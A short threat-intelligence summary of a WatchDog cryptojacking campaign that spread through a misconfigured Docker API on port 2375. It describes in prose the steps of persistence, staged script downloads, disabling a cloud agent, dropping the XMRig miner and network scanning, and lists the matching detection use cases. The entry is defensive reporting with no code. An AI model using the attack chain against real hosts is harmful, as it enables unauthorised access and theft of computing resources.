Cryptojacking Group WatchDog Attack Cabo Labs
Cryptojacking Group WatchDog Attack Cabo Labs
Industry: N/A | Level: Tactical | Source: Cado Security
Researchers at Cado Labs report a cryptojacking attack observed from the company's honeypot. The attack is attributed to cryptojacking group, WatchDog a rival threat group to TeamTNT another known threat actor targeting cloud environments. The campaign was initiated by exploiting a publicly misconfigured Docker API over port 2375 as the default setting was left unsecured, enabling unauthenticated access to the Docker daemon. Once the foothold was established the attacker created a new Alpine Linux Docker container and established persistence with a cron job. The attacker executes a shell script to check the system's infection status listing processes, host configuration, downloads a second-stage payload, and checks user permissions as root permissions are needed for the campaign. The second-stage shell script manipulates the system's timestamp and disables services such as the Alibaba Cloud Agent. The XMRig miner payload is dropped on the compromised host with a system service created for persistence. A third stage payload conducts network scanning, identifying hosts to pivot to, and drops two final scripts to initiate the propagation of the attack further into the victim’s network.
Anvilogic Scenario:
- WatchDog Cryptojacking Attack
Anvilogic Use Cases:
- Publicly exposed Docker API
- New Docker Container
- File Download (Unix)
- Crontab Job Scheduling (Unix)
- Timestamp Manipulation
- Rare shell script execution
- Service Stop Commands
- File Modified for Execution
- Linux Enumeration Techniques